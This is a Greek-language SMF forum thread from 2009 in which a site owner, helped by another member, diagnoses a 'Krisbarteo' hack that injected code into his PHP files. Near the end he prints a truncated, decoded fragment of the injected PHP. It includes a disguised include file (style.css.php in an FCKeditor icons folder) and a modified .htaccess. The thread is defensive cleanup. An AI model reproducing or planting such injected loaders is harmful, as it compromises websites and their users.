News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

Χανονται τα avantars!

Started by triantis7, September 02, 2009, 03:54:25 PM

Previous topic - Next topic

triantis7

Παίδες φεύγουν τα avantars απο τα προφιλ των μελων!

Ξερετε τι μπορει να παιζει?
Τα avantars δεν διαγραφονται απο τον καταλογο που γινονται upload απλα δεν εμφανιζονται πλεον στα προφιλ.
Και να το βαλω παλι θα βγει μετα απο κανα 20ημερο!!

agridoc

#1
Δες αν υπάρχει χρήστης Krisbarteo.

Δες και αυτό 1.1.8/2.0 RC1 Exploit Utility - kb_scan.php.

Εύχομαι να μην είναι hack, δεν αποκλείεται όμως. Ελεγξε και με FTP τις ημερομηνίες των PHP αρχείων σου, για τυχόν τροποποιήσεις.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

triantis7

Ωχ οντως υπάρχει!!
Και ειναι σπαμ πως μου ξεφυγε...

τον διεγραψα... αυτο εφταιγε λες?

agridoc

Το οτι υπήρχε σημαίνει οτι ενδεχομένως να έχει γίνει hacking μέσω του avatar του, χωρίς να είναι σίγουρο.

Δες το θέμα που έδωσα παραπάνω, διόρθωσα και το link. Δεν απάντησες για τις ημερομηνίες των PHP αρχείων, θα έχουν αλλάξει αν έχει γίνει hack.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

triantis7

ποια php να κοιταξω περισσότερο?

Τα περισσότερα έχουν ίδια ημερομηνία.. Για ρίξε μια ματια να μου πεις...

triantis7

Quote from: agridoc on September 02, 2009, 07:50:40 PM

Δες και αυτό 1.1.8/2.0 RC1 Exploit Utility - kb_scan.php.


Λοιπον εκανα upload αυτο το αρχειάκι,το έτρεξα και εκτος απο 3 αρχεια που ειναι κιτρινα, όλα τα άλλα ειναι κόκκινα!!!! με εσκισαν μάλλον ε??  Πατάω fix αλλα δεν κάνει τίποτα!

*Υπόψην το site Μου κατατάλλα δουλεύει μια χαρά!

agridoc

Απ' ότι δείχνουν τα πράγματα το site σου "χτυπήθηκε" στις 15 Ιουνίου 2009.

Ο χρόνος είναι αρκετός έως τώρα. Ξανατρέξε το kb_scan.php. Θέλει χρόνο για να καθαρίσει τα αρχεία.
Δες επίσης [NOTICE] How to secure your site against recent attacks,     Hacked, script injection.

Σε ποιο κατάλογο είναι εγκατεστημένο το SMF; Το συγκεκριμένο hacking, απ' όσο ξέρω, επηρεάζει όλα τα αρχεία PHP του καταλόγου που αντιστοιχεί στο domain, όχι μόνο του SMF.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

leftezi

Ερώτηση: To 2.0 RC 1-2 είναι ασφαλές σε αυτό το θέμα ή θέλει κι αυτό διόρθωση;

agridoc

Τα SMF 1.1.9, 2.0 RC1-2 και μεταγενέστερα δεν είναι εύκολο να προσβληθούν από το συγκεκριμένο hack.

ΠΡΟΣΟΧΗ όμως: Η αναβάθμιση δεν αποτελεί λύση για ήδη προσβεβλημένο site (αν πάει και καλά). Πρέπει πρώτα να εξαλειφθούν οι παρεμβάσεις του hack και μετά να γίνει αναβάθμιση.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

triantis7

Quote from: agridoc on September 09, 2009, 10:33:00 PM
Σε ποιο κατάλογο είναι εγκατεστημένο το SMF; Το συγκεκριμένο hacking, απ' όσο ξέρω, επηρεάζει όλα τα αρχεία PHP του καταλόγου που αντιστοιχεί στο domain, όχι μόνο του SMF.

Τα αρχεία που ανέβασα σε φοτος ποιο πάνω είναι ολα στο /public_html/Themes/default.
Αυτο με ρωτάς?

triantis7

Πάντως το kb_scan δεν εχει κανει τιποτα!
Δεν ξερω γιατι.παλι ολα κοκκινα ειναι εκτος 3 που ειναι κιτρινα!

agridoc

Quote from: triantis7 on September 12, 2009, 09:40:39 AM
Quote from: agridoc on September 09, 2009, 10:33:00 PM
Σε ποιο κατάλογο είναι εγκατεστημένο το SMF; Το συγκεκριμένο hacking, απ' όσο ξέρω, επηρεάζει όλα τα αρχεία PHP του καταλόγου που αντιστοιχεί στο domain, όχι μόνο του SMF.

Τα αρχεία που ανέβασα σε φοτος ποιο πάνω είναι ολα στο /public_html/Themes/default.
Αυτο με ρωτάς?

Οχι, πρέπει να ελέγξεις όλα τα αρχεία PHP στους καταλόγους από την ρίζα του domain και κάτω.

Δώσε ένα link για το site, αν δεν θέλεις δημόσια στείλε ΠΜ.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

triantis7

Λοιπόν το έψαξα αρκετά!!

Εχω φαει hack απο krisbarteo!!
Τα εχω παρει μου εχει βαλει ενα κομμάτι κώδικα σχεδόν σε όλα τα php αρχεία μου!!!
Θα πρέπει ειτε να κανω φρεσκο install η να αφαιρέσω τον κώδικα απο ένα ενα αρχεία!!

Επίσης μια ερώτηση!

Το αρχείο .htaccess τι πρέπει να γράφει μέσα?
Βλέπω κάποια παλιά μου backups και το .htaccess μέσα λέει
Options All

Αυτο που εχω τωρα ομως στο site μου λεει μεσα
<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml


Είναι απο κάποιο Update αυτο (δηλαδη φυσιολογικό?) η εχει πειραχτεί και αυτό και θα έπρεπε να λέει μέσα αυτο?  Options All

triantis7

Μετα απο decode του base64 κωδικα να τι γράφει:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/streetba/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')){include_once('/home/streetba/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20........................κτλ κτλ

Αυτος ο φάκελος 32 τι ρολο βαραει?
Εχει μεσα 3000 εγγραφες!!!!

andreaspetr

Μολις ανακαλυψα οτι ο ιδιος εχει χτυπησει και στο δικο μου Forum!  >:(

dimitrisglaros

Quote from: andreaspetr on September 17, 2009, 10:38:10 PM
Μολις ανακαλυψα οτι ο ιδιος εχει χτυπησει και στο δικο μου Forum!  >:(
Τουλάχιστον ξέρουμε τι πρέπει να κάνουμε!

Advertisement: